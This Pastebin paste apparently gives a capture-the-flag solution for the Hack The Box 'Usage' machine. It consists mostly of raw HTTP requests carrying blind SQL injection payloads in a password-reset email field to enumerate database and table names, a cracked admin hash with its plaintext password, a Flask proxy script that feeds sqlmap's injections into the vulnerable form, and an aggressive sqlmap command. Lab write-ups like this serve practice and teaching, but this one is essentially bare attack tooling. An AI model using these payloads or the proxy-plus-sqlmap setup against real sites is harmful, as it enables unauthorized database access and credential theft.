Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // Telegram : @HTB0X
- # to find DB name
- POST /forget-password HTTP/1.1
- Host: usage.htb
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: ar,en-US;q=0.7,en;q=0.3
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 168
- Origin: http://usage.htb
- Connection: close
- Referer: http://usage.htb/forget-password
- Cookie: XSRF-TOKEN=eyJpdiI6InllL01GejVmVnJCUUxXOG90NmRUMEE9PSIsInZhbHVlIjoiRkRhSWFKMEh1aXlqYlpVMURONEpET3NTQzBTajYxRkRtUjJWMGRiNFIwUVI4MEk2ek9KN1Mvd3Z6QSs0MkVzTTRXeHdJRUlUL2cxSEI1d042Y3FSUjBpVmZSSytMOVpKOHVFRWZ1TnJITVVqdkZFcHdFd0F6YStObS82VGo1WmQiLCJtYWMiOiIzMjhmOTA1MGI5NzU5YTUzNjIzZjk4ZWMzMjk5YjIxZTdkNjFlZmEyNjc0YTljMWY2ODI4OWE1NjU5ODY2OTMwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhvZmNRY0dSMWZzYlZST0JCaUlzRWc9PSIsInZhbHVlIjoicHM4Z05tbVA1ME9adUFCVXN3My9GNU9YaWU3UFY2VWVDY1c4eE1VK0Q2SWd1N0g0Vk1vV0ZmVHhWNGZXcnEza0drK09pNU5TWUVlYnVDVWlsMFBHaEp5a3VGK1hBK2pXRFZTMjJBWVNoSWczYitldGIwMlI2cHdtbitvNzF0TkkiLCJtYWMiOiIxOTgzMTY5NjViZGEzZjdjZDhkOTRiNDkxOWI5Yjk1NjI0NDhjZDE3ZjMxMWMyY2ViMmEwMzllMmY4NWRiOGVlIiwidGFnIjoiIn0%3D
- Upgrade-Insecure-Requests: 1
- _token=DSnOYQDQvZDLqbS28CtRwykhSZSw2Ufw4H7F3BIt&email=ali%40ali.com'+and+(select+substring((SELECT+schema_name+FROM+information_schema.schemata+limit+2,1),1,1)='u')--+-
- --------------------------------------------
- # to find tables name
- POST /forget-password HTTP/1.1
- Host: usage.htb
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: ar,en-US;q=0.7,en;q=0.3
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 206
- Origin: http://usage.htb
- Connection: close
- Referer: http://usage.htb/forget-password
- Cookie: XSRF-TOKEN=eyJpdiI6InllL01GejVmVnJCUUxXOG90NmRUMEE9PSIsInZhbHVlIjoiRkRhSWFKMEh1aXlqYlpVMURONEpET3NTQzBTajYxRkRtUjJWMGRiNFIwUVI4MEk2ek9KN1Mvd3Z6QSs0MkVzTTRXeHdJRUlUL2cxSEI1d042Y3FSUjBpVmZSSytMOVpKOHVFRWZ1TnJITVVqdkZFcHdFd0F6YStObS82VGo1WmQiLCJtYWMiOiIzMjhmOTA1MGI5NzU5YTUzNjIzZjk4ZWMzMjk5YjIxZTdkNjFlZmEyNjc0YTljMWY2ODI4OWE1NjU5ODY2OTMwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImhvZmNRY0dSMWZzYlZST0JCaUlzRWc9PSIsInZhbHVlIjoicHM4Z05tbVA1ME9adUFCVXN3My9GNU9YaWU3UFY2VWVDY1c4eE1VK0Q2SWd1N0g0Vk1vV0ZmVHhWNGZXcnEza0drK09pNU5TWUVlYnVDVWlsMFBHaEp5a3VGK1hBK2pXRFZTMjJBWVNoSWczYitldGIwMlI2cHdtbitvNzF0TkkiLCJtYWMiOiIxOTgzMTY5NjViZGEzZjdjZDhkOTRiNDkxOWI5Yjk1NjI0NDhjZDE3ZjMxMWMyY2ViMmEwMzllMmY4NWRiOGVlIiwidGFnIjoiIn0%3D
- Upgrade-Insecure-Requests: 1
- _token=DSnOYQDQvZDLqbS28CtRwykhSZSw2Ufw4H7F3BIt&email=ali%40ali.com'+and+(select+(select+substring((select+table_name+from+information_schema.tables+where+table_schema='usage_blog'+limit+3,1),1,1))='a')--+-
- ------------------------------
- admin user and pass
- admin:$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 password => whatever1
- -----
- # to make sqlmap inject
- # use this python code to wirk as proxy to follow redirect
- from flask import Flask, request, jsonify
- import requests
- app = Flask(__name__)
- @app.route('/proxy', methods=['GET'])
- def proxy():
- # Extract the 'inject' parameter from the GET request
- user_input = request.args.get('inject', '')
- # Define the URL to which the POST request will be sent
- url = 'http://usage.htb/forget-password'
- # Define the headers for the POST request
- headers = {
- 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0',
- 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
- 'Accept-Language': 'ar,en-US;q=0.7,en;q=0.3',
- 'Accept-Encoding': 'gzip, deflate, br',
- 'Content-Type': 'application/x-www-form-urlencoded',
- 'Origin': 'http://usage.htb',
- 'Connection': 'close',
- 'Referer': 'http://usage.htb/forget-password',
- 'Cookie': 'XSRF-TOKEN=eyJpdiI6InllL01GejVmVnJCUUxXOG90NmRUMEE9PSIsInZhbHVlIjoiRkRhSWFKMEh1aXlqYlpVMURONEpET3NTQzBTajYxRkRtUjJWMGRiNFIwUVI4MEk2ek9KN1Mvd3Z6QSs0MkVzTTRXeHdJRUlUL2cxSEI1d042Y3FSUjBpVmZSSytMOVpKOHVFRWZ1TnJITVVqdkZFcHdFd0F6YStObS82VGo1WmQiLCJtYWMiOiIzMjhmOTA1MGI5NzU5YTUzNjIzZjk4ZWMzMjk5YjIxZTdkNjFlZmEyNjc0YTljMWY2ODI4OWE1NjU5ODY2OTMwIiwidGdgIjoiIn0=; laravel_session=eyJpdiI6ImhvZmNRY0dSMWZzYlZST0JCaUlzRWc9PSIsInZhbHVlIjoicHM4Z05tbVA1ME9adUFCVXN3My9GNU9YaWU3UFY2VWVDY1c4eE1VK0Q2SWd1N0g0Vk1vV0ZmVHhWNGZXcnEza0drK09pNU5TWUVlYnVDVWlsMFBHaEp5a3VGK1hBK2pXRFZTMjJBWVNoSWczYitldGIwMlI2cHdtbitvNzF0TkkiLCJtYWMiOiIxOTgzMTY5NjViZGEzZjdjZDhkOTRiNDkxOWI5Yjk1NjI0NDhjZDE3ZjMxMWMyY2ViMmEwMzllMmY4NWRiOGVlIiwidGdgIjoiIn0='
- }
- # Define the data to be sent in the POST request
- data = {
- '_token': 'DSnOYQDQvZDLqbS28CtRwykhSZSw2Ufw4H7F3BIt',
- 'email': user_input # Injecting user-provided input into the email field
- }
- # Send the POST request
- response = requests.post(url, headers=headers, data=data)
- # Return the content of the response from the target server
- return response.text
- if __name__ == '__main__':
- app.run(debug=True)
- # sqlmap -u "http://127.0.0.1:5000/proxy?inject=ali@ali.com" --technique=B --threads 10 --batch --level 5 --risk 3 --dbs
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
